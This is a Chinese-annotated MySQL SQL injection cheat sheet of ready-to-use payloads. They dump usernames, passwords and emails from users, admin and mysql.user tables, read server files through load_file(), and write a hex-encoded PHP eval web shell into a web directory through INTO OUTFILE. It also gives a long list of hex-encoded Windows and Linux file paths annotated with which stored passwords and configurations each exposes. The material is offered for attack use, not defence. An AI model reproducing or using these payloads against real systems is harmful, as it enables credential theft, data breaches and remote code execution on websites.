Mysql sqlinjection code
# %23 -- /* /**/ 注釋
UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--
and+(select+count(*)+from+mysql.user)>0-- 判斷是否能讀取MYSQL表
CONCAT_WS(CHAR(32,58,32),user(),database(),version()) 用戶名 數據庫 MYSQL版本
union+select+1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,7--
union all select 1,concat(user,0x3a,pass,0x3a,email) from users/* 獲取users表的用戶名 密碼 email 信息
unhex(hex(@@version)) unhex方式查看版本
union all select 1,unhex(hex(@@version)),3/*
convert(@@version using latin1) latin 方式查看版本
union+all+select+1,convert(@@version using latin1),3--
CONVERT(user() USING utf8)
union+all+select+1,CONVERT(user() USING utf8),3-- latin方式查看用戶名
and+1=2+union+select+1,passw,3+from+admin+from+mysql.user-- 獲取MYSQL帳戶信息
union+all+select+1,concat(user,0x3a,password),3+from+mysql.user-- 獲取MYSQL帳戶信息
union+select+1,concat_ws(0x3a,username,password),3+FROM+ADMIN-- 讀取admin表 username password 數據 0x3a 為“:” 冒號
union+all+select+1,concat(username,0x3a,password),3+from+admin--
union+all+select+1,concat(username,char(58),password),3+from admin--
UNION+SELECT+1,2,3,4,load_file(0x2F6574632F706173737764),6-- 通過load_file()函數讀取文件
UNION+SELECT+1,2,3,4,replace(load_file(0x2F6574632F706173737764),0x3c,0x20),6-- 通過replace函數將數據完全顯示
union+select+1,2,3,char(0x3C3F706870206576616C28245F504F53545B39305D3F3B3E),5,6,7,8,9,10,7+into+outfile+'d:\web\90team.php'-- 在web目錄寫入一句話木馬
<?php+eval($_POST[90]?;> 為上面16進制編碼后的一句話原型
union+select+1,2,3,load_file(d:\web\logo123.jpg),5,6,7,8,9,10,7+into+outfile+'d:\web\90team.php'-- 將PHP馬改成圖片類型上傳之網站,再通過into outfile 寫入web目錄
常用查詢函數
1:system_user() 系統用戶名
2:user() 用戶名
3:current_user 當前用戶名
4:session_user()連接數據庫的用戶名
5:database() 數據庫名
6:version() MYSQL數據庫版本 @@version
7:load_file() MYSQL讀取本地文件的函數
8:@@datadir 讀取數據庫路徑
9:@@basedir MYSQL 安裝路徑
10:@@version_compile_os 操作系統
WINDOWS下:
c:/boot.ini //查看系統版本 0x633A2F626F6F742E696E690D0A
c:/windows/php.ini //php配置信息 0x633A2F77696E646F77732F7068702E696E69
c:/windows/my.ini //MYSQL配置文件,記錄管理員登陸過的MYSQL用戶名和密碼 0x633A2F77696E646F77732F6D792E696E69
c:/winnt/php.ini 0x633A2F77696E6E742F7068702E696E69
c:/winnt/my.ini 0x633A2F77696E6E742F6D792E696E69
c:\mysql\data\mysql\user.MYD //存儲了mysql.user表中的數據庫連接密碼 0x633A5C6D7973716C5C646174615C6D7973716C5C757365722E4D5944
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存儲了虛擬主機網站路徑和密碼
0x633A5C50726F6772616D2046696C65735C5268696E6F536F66742E636F6D5C536572762D555C53657276554461656D6F6E2E696E69
c:\Program Files\Serv-U\ServUDaemon.ini 0x633A5C50726F6772616D2046696C65735C536572762D555C53657276554461656D6F6E2E696E69
c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件
c:\windows\repair\sam //存儲了WINDOWS系統初次安裝的密碼
c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理員密碼存儲於此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif 文件
//存儲了pcAnywhere的登陸密碼
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看 WINDOWS系統apache文件
0x633A5C50726F6772616D2046696C65735C4170616368652047726F75705C4170616368655C636F6E66205C68747470642E636F6E66
c:/Resin-3.0.14/conf/resin.conf //查看jsp開發的網站 resin文件配置信息. 0x633A2F526573696E2D332E302E31342F636F6E662F726573696E2E636F6E66
c:/Resin/conf/resin.conf 0x633A2F526573696E2F636F6E662F726573696E2E636F6E66
/usr/local/resin/conf/resin.conf 查看linux系統配置的JSP虛擬主機 0x2F7573722F6C6F63616C2F726573696E2F636F6E662F726573696E2E636F6E66
d:\APACHE\Apache2\conf\httpd.conf 0x643A5C4150414348455C417061636865325C636F6E665C68747470642E636F6E66
C:\Program Files\mysql\my.ini 0x433A5C50726F6772616D2046696C65735C6D7973716C5C6D792E696E69
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虛擬主機配置 0x633A5C77696E646F77735C73797374656D33325C696E65747372765C4D657461426173652E786D6C
C:\mysql\data\mysql\user.MYD 存在MYSQL系統中的用戶密碼 0x433A5C6D7973716C5C646174615C6D7973716C5C757365722E4D5944
LUNIX/UNIX下:
/etc/passwd 0x2F6574632F706173737764
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件 0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F68747470642E636F6E66
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虛擬網站設置 0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F65787472612F68747470642D76686F7374732E636F6E66
/usr/local/app/php5/lib/php.ini //PHP相關設置 0x2F7573722F6C6F63616C2F6170702F706870352F6C69622F7068702E696E69
/etc/sysconfig/iptables //從中得到防火牆規則策略 0x2F6574632F737973636F6E6669672F69707461626C657320
/etc/httpd/conf/httpd.conf // apache配置文件 0x2F6574632F68747470642F636F6E662F68747470642E636F6E66
/etc/rsyncd.conf //同步程序配置文件 0x2F6574632F7273796E63642E636F6E66
/etc/my.cnf //mysql的配置文件 0x2F6574632F6D792E636E66
/etc/redhat-release //系統版本 0x2F6574632F7265646861742D72656C65617365
/etc/issue 0x2F6574632F6973737565
/etc/issue.net 0x2F6574632F69737375652E6E6574
/usr/local/app/php5/lib/php.ini //PHP相關設置 0x2F7573722F6C6F63616C2F6170702F706870352F6C69622F7068702E696E69
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虛擬網站設置 0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F65787472612F68747470642D76686F7374732E636F6E66
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虛擬主機配置文件 0x2F6574632F68747470642F636F6E662F68747470642E636F6E66
0x2F7573722F6C6F63616C2F61706368652F636F6E662F68747470642E636F6E66
/usr/local/resin-3.0.22/conf/resin.conf 針對3.0.22的RESIN配置文件查看 0x2F7573722F6C6F63616C2F726573696E2D332E302E32322F636F6E662F726573696E2E636F6E66
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上 0x2F7573722F6C6F63616C2F726573696E2D70726F2D332E302E32322F636F6E662F726573696E2E636F6E66
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虛擬主機查看
0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F65787472612F68747470642D76686F7374732E636F6E66
/etc/sysconfig/iptables 查看防火牆策略 0x2F6574632F737973636F6E6669672F69707461626C6573
load_file(char(47)) 列出FreeBSD,Sunos系統根目錄
replace(load_file(0x2F6574632F706173737764),0x3c,0x20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面兩個是查看一個PHP文件里完全顯示代碼.有些時候不替換一些字符,如 "<" 替換成"空格" 返回的是網頁.而無法查看到代碼.
